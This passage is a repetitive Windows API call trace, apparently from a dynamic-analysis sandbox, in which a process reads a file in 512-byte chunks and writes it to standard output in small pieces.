lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.960] GetFileType (hFile=0x50) returned 0x1 [0162.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.960] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.961] GetFileType (hFile=0x50) returned 0x1 [0162.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.961] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.961] GetFileType (hFile=0x50) returned 0x1 [0162.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.961] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.961] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.961] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.961] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.961] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.961] GetFileType (hFile=0x50) returned 0x1 [0162.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.961] GetFileType (hFile=0x50) returned 0x1 [0162.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.961] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.961] GetFileType (hFile=0x50) returned 0x1 [0162.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.961] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.962] GetFileType (hFile=0x50) returned 0x1 [0162.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.962] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.962] GetFileType (hFile=0x50) returned 0x1 [0162.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.962] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.962] GetFileType (hFile=0x50) returned 0x1 [0162.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.962] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.962] GetFileType (hFile=0x50) returned 0x1 [0162.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.962] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.962] GetFileType (hFile=0x50) returned 0x1 [0162.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.962] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.963] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.963] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.963] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.963] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.963] GetFileType (hFile=0x50) returned 0x1 [0162.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.963] GetFileType (hFile=0x50) returned 0x1 [0162.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.963] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.963] GetFileType (hFile=0x50) returned 0x1 [0162.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.963] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.964] GetFileType (hFile=0x50) returned 0x1 [0162.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.964] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.964] GetFileType (hFile=0x50) returned 0x1 [0162.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.964] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.964] GetFileType (hFile=0x50) returned 0x1 [0162.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.964] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.964] GetFileType (hFile=0x50) returned 0x1 [0162.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.965] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.965] GetFileType (hFile=0x50) returned 0x1 [0162.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.965] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.966] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.966] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.966] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.966] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.966] GetFileType (hFile=0x50) returned 0x1 [0162.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.967] GetFileType (hFile=0x50) returned 0x1 [0162.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.968] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.968] GetFileType (hFile=0x50) returned 0x1 [0162.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.968] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.968] GetFileType (hFile=0x50) returned 0x1 [0162.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.968] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.968] GetFileType (hFile=0x50) returned 0x1 [0162.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.968] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.968] GetFileType (hFile=0x50) returned 0x1 [0162.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.968] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.968] GetFileType (hFile=0x50) returned 0x1 [0162.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.970] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.970] GetFileType (hFile=0x50) returned 0x1 [0162.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.970] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.970] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.970] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.970] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.970] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.970] GetFileType (hFile=0x50) returned 0x1 [0162.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.970] GetFileType (hFile=0x50) returned 0x1 [0162.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.970] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.970] GetFileType (hFile=0x50) returned 0x1 [0162.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.970] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] GetFileType (hFile=0x50) returned 0x1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] GetFileType (hFile=0x50) returned 0x1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] GetFileType (hFile=0x50) returned 0x1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] GetFileType (hFile=0x50) returned 0x1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] GetFileType (hFile=0x50) returned 0x1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.971] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.971] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.971] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.971] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] GetFileType (hFile=0x50) returned 0x1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] GetFileType (hFile=0x50) returned 0x1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] GetFileType (hFile=0x50) returned 0x1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] GetFileType (hFile=0x50) returned 0x1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] GetFileType (hFile=0x50) returned 0x1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] GetFileType (hFile=0x50) returned 0x1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] GetFileType (hFile=0x50) returned 0x1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] GetFileType (hFile=0x50) returned 0x1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.972] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.972] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.972] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.972] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] GetFileType (hFile=0x50) returned 0x1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] GetFileType (hFile=0x50) returned 0x1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] GetFileType (hFile=0x50) returned 0x1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] GetFileType (hFile=0x50) returned 0x1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] GetFileType (hFile=0x50) returned 0x1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] GetFileType (hFile=0x50) returned 0x1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] GetFileType (hFile=0x50) returned 0x1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] GetFileType (hFile=0x50) returned 0x1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.973] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.973] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.973] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.973] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] GetFileType (hFile=0x50) returned 0x1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] GetFileType (hFile=0x50) returned 0x1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] GetFileType (hFile=0x50) returned 0x1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] GetFileType (hFile=0x50) returned 0x1 [0162.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] GetFileType (hFile=0x50) returned 0x1 [0162.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] GetFileType (hFile=0x50) returned 0x1 [0162.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] GetFileType (hFile=0x50) returned 0x1 [0162.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] GetFileType (hFile=0x50) returned 0x1 [0162.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.974] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.974] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, 